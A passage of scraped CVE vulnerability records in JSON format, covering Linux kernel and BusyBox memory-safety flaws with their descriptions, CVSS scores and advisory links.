{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T12:35:49.594Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/all/20220908132754.30532-1-tiwai%40suse.de/" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/log/drivers/media/dvb-core/dmxdev.c" }, { "name": "[oss-security] 20220923 CVE-2022-41218: Linux dvb-core: UAF in dvb-core/dmxdev", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/09/23/4" }, { "name": "[oss-security] 20220923 Re: [Report v2] CVE-2022-41218: Linux dvb-core: UAF in dvb-core/dmxdev", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/09/24/2" }, { "name": "[oss-security] 20220923 [Report v2] CVE-2022-41218: Linux dvb-core: UAF in dvb-core/dmxdev", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/09/24/1" }, { "name": "DSA-5324", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5324" }, { "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=fd3d91ab1c6ab0628fe642dd570b56302c30a792" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "In drivers/media/dvb-core/dmxdev.c in the Linux kernel through 5.19.10, there is a use-after-free caused by refcount races, affecting dvb_demux_open and dvb_dmxdev_release." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-25T00:41:17.864220", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://lore.kernel.org/all/20220908132754.30532-1-tiwai%40suse.de/" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/log/drivers/media/dvb-core/dmxdev.c" }, { "name": "[oss-security] 20220923 CVE-2022-41218: Linux dvb-core: UAF in dvb-core/dmxdev", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2022/09/23/4" }, { "name": "[oss-security] 20220923 Re: [Report v2] CVE-2022-41218: Linux dvb-core: UAF in dvb-core/dmxdev", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2022/09/24/2" }, { "name": "[oss-security] 20220923 [Report v2] CVE-2022-41218: Linux dvb-core: UAF in dvb-core/dmxdev", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2022/09/24/1" }, { "name": "DSA-5324", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5324" }, { "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" }, { "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=fd3d91ab1c6ab0628fe642dd570b56302c30a792" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-41218", "datePublished": "2022-09-21T00:00:00", "dateReserved": "2022-09-21T00:00:00", "dateUpdated": "2024-08-03T12:35:49.594Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-20421
Vulnerability from cvelistv5
Published
2022-10-11 00:00
Modified
2024-08-03 02:10
Severity ?
EPSS score ?
Summary
In binder_inc_ref_for_node of binder.c, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-239630375References: Upstream kernel
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T02:10:44.836Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://source.android.com/security/bulletin/2022-10-01" }, { "name": "DSA-5257", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Android", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Android kernel" } ] } ], "descriptions": [ { "lang": "en", "value": "In binder_inc_ref_for_node of binder.c, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-239630375References: Upstream kernel" } ], "problemTypes": [ { "descriptions": [ { "description": "Elevation of privilege", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-11-01T00:00:00", "orgId": "baff130e-b8d5-4e15-b3d3-c3cf5d5545c6", "shortName": "google_android" }, "references": [ { "url": "https://source.android.com/security/bulletin/2022-10-01" }, { "name": "DSA-5257", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ] } }, "cveMetadata": { "assignerOrgId": "baff130e-b8d5-4e15-b3d3-c3cf5d5545c6", "assignerShortName": "google_android", "cveId": "CVE-2022-20421", "datePublished": "2022-10-11T00:00:00", "dateReserved": "2021-10-14T00:00:00", "dateUpdated": "2024-08-03T02:10:44.836Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-36879
Vulnerability from cvelistv5
Published
2022-07-27 03:27
Modified
2024-08-03 10:14
Severity ?
EPSS score ?
Summary
An issue was discovered in the Linux kernel through 5.18.14. xfrm_expand_policies in net/xfrm/xfrm_policy.c can cause a refcount to be dropped twice.
References
▼ | URL | Tags |
---|---|---|
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=f85daf0e725358be78dfd208dea5fd665d8cb901 | x_refsource_MISC | |
https://github.com/torvalds/linux/commit/f85daf0e725358be78dfd208dea5fd665d8cb901 | x_refsource_MISC | |
https://www.debian.org/security/2022/dsa-5207 | vendor-advisory, x_refsource_DEBIAN | |
https://security.netapp.com/advisory/ntap-20220901-0007/ | x_refsource_CONFIRM | |
https://lists.debian.org/debian-lts-announce/2022/09/msg00011.html | mailing-list, x_refsource_MLIST | |
https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html | mailing-list, x_refsource_MLIST |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T10:14:29.394Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=f85daf0e725358be78dfd208dea5fd665d8cb901" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/f85daf0e725358be78dfd208dea5fd665d8cb901" }, { "name": "DSA-5207", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5207" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20220901-0007/" }, { "name": "[debian-lts-announce] 20220911 [SECURITY] [DLA 3102-1] linux-5.10 new package", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00011.html" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in the Linux kernel through 5.18.14. xfrm_expand_policies in net/xfrm/xfrm_policy.c can cause a refcount to be dropped twice." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-10-02T18:06:01", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=f85daf0e725358be78dfd208dea5fd665d8cb901" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/torvalds/linux/commit/f85daf0e725358be78dfd208dea5fd665d8cb901" }, { "name": "DSA-5207", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "https://www.debian.org/security/2022/dsa-5207" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://security.netapp.com/advisory/ntap-20220901-0007/" }, { "name": "[debian-lts-announce] 20220911 [SECURITY] [DLA 3102-1] linux-5.10 new package", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00011.html" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2022-36879", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An issue was discovered in the Linux kernel through 5.18.14. xfrm_expand_policies in net/xfrm/xfrm_policy.c can cause a refcount to be dropped twice." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=f85daf0e725358be78dfd208dea5fd665d8cb901", "refsource": "MISC", "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=f85daf0e725358be78dfd208dea5fd665d8cb901" }, { "name": "https://github.com/torvalds/linux/commit/f85daf0e725358be78dfd208dea5fd665d8cb901", "refsource": "MISC", "url": "https://github.com/torvalds/linux/commit/f85daf0e725358be78dfd208dea5fd665d8cb901" }, { "name": "DSA-5207", "refsource": "DEBIAN", "url": "https://www.debian.org/security/2022/dsa-5207" }, { "name": "https://security.netapp.com/advisory/ntap-20220901-0007/", "refsource": "CONFIRM", "url": "https://security.netapp.com/advisory/ntap-20220901-0007/" }, { "name": "[debian-lts-announce] 20220911 [SECURITY] [DLA 3102-1] linux-5.10 new package", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00011.html" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-36879", "datePublished": "2022-07-27T03:27:41", "dateReserved": "2022-07-27T00:00:00", "dateUpdated": "2024-08-03T10:14:29.394Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-42896
Vulnerability from cvelistv5
Published
2022-11-23 14:11
Modified
2024-08-03 13:19
Severity ?
EPSS score ?
Summary
There are use-after-free vulnerabilities in the Linux kernel's net/bluetooth/l2cap_core.c's l2cap_connect and l2cap_le_connect_req functions which may allow code execution and leaking kernel memory (respectively) remotely via Bluetooth. A remote attacker could execute code leaking kernel memory via Bluetooth if within proximity of the victim.
We recommend upgrading past commit https://www.google.com/url https://github.com/torvalds/linux/commit/711f8c3fb3db61897080468586b970c87c61d9e4 https://www.google.com/url
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | Linux | Linux Kernel |
Version: 3.0.0 < |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T13:19:05.444Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/711f8c3fb3db61897080468586b970c87c61d9e4" }, { "tags": [ "x_transferred" ], "url": "https://kernel.dance/#711f8c3fb3db61897080468586b970c87c61d9e4" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "packageName": "kernel", "product": "Linux Kernel", "repo": "https://git.kernel.org", "vendor": "Linux", "versions": [ { "lessThanOrEqual": "711f8c3fb3db61897080468586b970c87c61d9e4", "status": "affected", "version": "3.0.0", "versionType": "custom" } ] } ], "datePublic": "2022-11-02T23:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eThere are use-after-free vulnerabilities in the Linux kernel\u0027s net/bluetooth/l2cap_core.c\u0027s l2cap_connect and l2cap_le_connect_req functions which may allow code execution and leaking kernel memory (respectively) remotely via Bluetooth.\u0026nbsp;\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eA remote attacker could execute code leaking kernel memory via Bluetooth if within proximity of the victim.\u003c/span\u003e\u003cbr\u003e\u003c/span\u003e\u003c/span\u003e\u003cbr\u003eWe recommend upgrading past commit\u0026nbsp;\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://www.google.com/url?q=https://github.com/torvalds/linux/commit/b1a2cd50c0357f243b7435a732b4e62ba3157a2e\u0026amp;sa=D\u0026amp;source=buganizer\u0026amp;usg=AOvVaw1MgsfyPTiSrqqs3LAs-ZRS\"\u003e\u003c/a\u003e\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://www.google.com/url?q=https://github.com/torvalds/linux/commit/711f8c3fb3db61897080468586b970c87c61d9e4\u0026amp;sa=D\u0026amp;source=buganizer\u0026amp;usg=AOvVaw22K1DH0yRHxuiaUXy9_wmV\"\u003ehttps://github.com/torvalds/linux/commit/711f8c3fb3db61897080468586b970c87c61d9e4\u003c/a\u003e\u003cbr\u003e\u003cbr\u003e" } ], "value": "There are use-after-free vulnerabilities in the Linux kernel\u0027s net/bluetooth/l2cap_core.c\u0027s l2cap_connect and l2cap_le_connect_req functions which may allow code execution and leaking kernel memory (respectively) remotely via Bluetooth.\u00a0A remote attacker could execute code leaking kernel memory via Bluetooth if within proximity of the victim.\n\nWe recommend upgrading past commit\u00a0 https://www.google.com/url https://github.com/torvalds/linux/commit/711f8c3fb3db61897080468586b970c87c61d9e4 https://www.google.com/url \n\n" } ], "impacts": [ { "capecId": "CAPEC-253", "descriptions": [ { "lang": "en", "value": "CAPEC-253 Remote Code Inclusion" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "baseScore": 8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-11-23T14:13:44.351Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "url": "https://github.com/torvalds/linux/commit/711f8c3fb3db61897080468586b970c87c61d9e4" }, { "url": "https://kernel.dance/#711f8c3fb3db61897080468586b970c87c61d9e4" } ], "source": { "discovery": "EXTERNAL" }, "title": "Info Leak in l2cap_core in the Linux Kernel", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2022-42896", "datePublished": "2022-11-23T14:11:56.811Z", "dateReserved": "2022-10-12T18:30:19.769Z", "dateUpdated": "2024-08-03T13:19:05.444Z", "requesterUserId": "ed9b5bb2-2df1-4aa3-9791-5fb260d88e62", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3028
Vulnerability from cvelistv5
Published
2022-08-31 00:00
Modified
2024-08-03 00:53
Severity ?
EPSS score ?
Summary
A race condition was found in the Linux kernel's IP framework for transforming packets (XFRM subsystem) when multiple calls to xfrm_probe_algs occurred simultaneously. This flaw could allow a local attacker to potentially trigger an out-of-bounds write or leak kernel heap memory by performing an out-of-bounds read and copying it into a socket.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Linux kernel |
Version: Fixed in kernel 6.0-rc3 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:53:00.701Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/ba953a9d89a00c078b85f4b190bc1dde66fe16b5" }, { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/all/YtoWqEkKzvimzWS5%40gondor.apana.org.au/T/" }, { "name": "FEDORA-2022-6835ddb6d8", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F3MYP7WX4PNE6RCITVXA43CECBZT4CL6/" }, { "name": "FEDORA-2022-35c14ba5bb", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JKVA75UHKVOHNOEPCLUHTFGWCOOUBDM3/" }, { "name": "FEDORA-2022-ccb0138bb6", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PEQYVCNYUWB4CJ2YRAYNF2GGFQ7SUYC4/" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230214-0004/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Linux kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Fixed in kernel 6.0-rc3" } ] } ], "descriptions": [ { "lang": "en", "value": "A race condition was found in the Linux kernel\u0027s IP framework for transforming packets (XFRM subsystem) when multiple calls to xfrm_probe_algs occurred simultaneously. This flaw could allow a local attacker to potentially trigger an out-of-bounds write or leak kernel heap memory by performing an out-of-bounds read and copying it into a socket." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-667", "description": "CWE-667, CWE-362, CWE-125, CWE-787", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-02-14T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://github.com/torvalds/linux/commit/ba953a9d89a00c078b85f4b190bc1dde66fe16b5" }, { "url": "https://lore.kernel.org/all/YtoWqEkKzvimzWS5%40gondor.apana.org.au/T/" }, { "name": "FEDORA-2022-6835ddb6d8", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F3MYP7WX4PNE6RCITVXA43CECBZT4CL6/" }, { "name": "FEDORA-2022-35c14ba5bb", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JKVA75UHKVOHNOEPCLUHTFGWCOOUBDM3/" }, { "name": "FEDORA-2022-ccb0138bb6", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PEQYVCNYUWB4CJ2YRAYNF2GGFQ7SUYC4/" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230214-0004/" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-3028", "datePublished": "2022-08-31T00:00:00", "dateReserved": "2022-08-29T00:00:00", "dateUpdated": "2024-08-03T00:53:00.701Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-42382
Vulnerability from cvelistv5
Published
2021-11-15 00:00
Modified
2024-08-04 03:30
Severity ?
EPSS score ?
Summary
A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_s function
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T03:30:38.251Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "tags": [ "x_transferred" ], "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "busybox", "vendor": "busybox", "versions": [ { "lessThan": "1.34.0", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free in Busybox\u0027s awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_s function" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-25T00:00:00", "orgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "shortName": "JFROG" }, "references": [ { "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ] } }, "cveMetadata": { "assignerOrgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "assignerShortName": "JFROG", "cveId": "CVE-2021-42382", "datePublished": "2021-11-15T00:00:00", "dateReserved": "2021-10-14T00:00:00", "dateUpdated": "2024-08-04T03:30:38.251Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-42385
Vulnerability from cvelistv5
Published
2021-11-15 00:00
Modified
2024-08-04 03:30
Severity ?
EPSS score ?
Summary
A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T03:30:38.291Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "tags": [ "x_transferred" ], "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "busybox", "vendor": "busybox", "versions": [ { "lessThan": "1.34.0", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free in Busybox\u0027s awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-25T00:00:00", "orgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "shortName": "JFROG" }, "references": [ { "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ] } }, "cveMetadata": { "assignerOrgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "assignerShortName": "JFROG", "cveId": "CVE-2021-42385", "datePublished": "2021-11-15T00:00:00", "dateReserved": "2021-10-14T00:00:00", "dateUpdated": "2024-08-04T03:30:38.291Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-0179
Vulnerability from cvelistv5
Published
2023-03-27 00:00
Modified
2024-08-02 05:02
Severity ?
EPSS score ?
Summary
A buffer overflow vulnerability was found in the Netfilter subsystem in the Linux Kernel. This issue could allow the leakage of both stack and heap addresses, and potentially allow Local Privilege Escalation to the root user via arbitrary code execution.
References
